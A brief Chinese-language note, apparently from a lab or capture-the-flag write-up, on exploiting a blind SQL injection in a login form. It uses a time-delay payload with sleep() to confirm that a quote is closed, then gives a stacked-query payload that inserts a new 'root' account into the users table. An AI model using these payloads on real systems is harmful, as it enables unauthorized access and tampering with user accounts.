盲注漏洞,登陆失败和注入失败显示的同一个页面
可以用sleep函数通过延时判断是否闭合引号成功
这个方法有一点不好的地方在于,并不能去控制延时,延时的时间取决于users表中的数据数量和sleep函数的参数
login_user=1&login_password=1' or sleep(0.1)#
14条数据延时了1.4s
但延时的出现就证明引号闭合成功了
login_user=1&login_password=1';insert into users(id,username,password) value(15,'root','root')#
